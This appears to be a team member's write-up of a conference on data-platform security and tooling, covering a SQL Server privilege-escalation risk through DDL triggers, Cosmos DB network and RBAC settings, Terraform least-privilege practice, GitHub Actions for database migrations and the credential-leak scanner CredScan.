Erland Sommarskog presented “Don’t Let Your Permissions be Hijacked” which covered an attack on SQL server where somebody with db_owner on a database could elevate themselves to a sysadmin on the server by abusing the ability to create DDL triggers. In short, if you can create a trigger on a database, and then a sysadmin runs a maintenance job, e.g. updating indexes, then your trigger will get run as them and the trigger can then grant you sysadmin access. I think we’re probably protected from this because of the way SQL Azure works but I’ll have a proper look through the slides and code at some point. It’s a good lesson in why we want to follow least privilege.
Erland Sommarskog also explained how you can package permissions inside a stored procedure, so that users can perform privileged actions in a way you have control over. The article on how to do this is extremely long but this is worth knowing about in case we ever have the scenario where we need to allow an application (or manual workaround?) to have more permissions than it normally needs, but wrapped up in a tamper-proof signed stored procedure.
Heini Ilmarinen covered how to secure Cosmos DB. This was a good refresher for me on Cosmos DB as it’d been a couple of years since I’ve done anything with it. The first part of securing it was around network security – it’s very similar to how blob storage is configured, e.g. VNETs, IP restrictions, private link. One complexity is that if you use the feature of Cosmos DB to be replicated across the world, you need to make sure you set up the VNETs and private link for each region – if you want it to work during regional unavailability.
The second part of securing Cosmos DB was around access control. Interestingly, although there are Azure AD RBAC roles you can use, they’re very coarse and only works at the account (resource) level. So, if you want access to resources to be fine-grained, like we have for SQL Server – you need to use Cosmos DB RBAC. This is another layer of access control that’s Cosmos DB specific and lets you scope access to specific databases/containers. Fortunately, it looks like Terraform supports this. There’s no UI for this in the Azure Portal currently either.
Robert Hartskeerl covered some of the built-in security features in recent SQL Server versions – dynamic data masking, row level security and encryption. Nothing particularly new here but a good reminder of how it worked. Unfortunately most of the session was spent trying to make a point about it being possible to roll your own versions of these features in SQL Server 2000 – which was interesting but not very useful.
There were a couple of shorter sessions on persuasive communication and another on how to manage your time. Use of Pomodoro technique, planning your day properly, removing distractions etc.
Ben Somerville Roberts presented Top Ten Terraform Trip Ups. Some interesting ideas around reducing the permissions needed by the Terraform runner e.g. if the runner is the Owner of a resource group, it doesn’t need to be an Owner of the entire subscription. If you plan it carefully you can split your Terraform up into the parts that need to make highly privileged operations e.g. creating resources, and those which need lower privileges for day to day operations e.g. updating configuration of existing resources. On the Azure side of Terraform, to make things less brittle we should always be using the data resources to get hold of IDs for anything, e.g. identities. Never hardcoding GUIDs etc. And finally he recommended creating a pipeline for removing locks, which we already have – but re-assuring to know this is commonly done.
The final session was on GitHub Actions, which is similar to DevOps pipelines. The feeling is that GitHub Actions is the future and where Microsoft is putting more effort but currently they offer pretty much the same functionality. The theme of the session was database migrations so covered some info on Dacpac deployments (you can use the newer SDK project type now), DbUp (tool for migrations). There was a bit on the GitHub Actions bot which was interesting but not currently useful for us. Credscan – this popped up during the GitHub session and is a tool developed and maintained by Microsoft to identify credential leaks such as those in source code and configuration files. Worth taking a look at this or similar tools once Michael has joined us I think.
Finally, I had a demo of JetBrains Rider (which some of us use already) and it has really nice SQL integration, including code completion and refactoring. I’ll give it a go and see how I get on.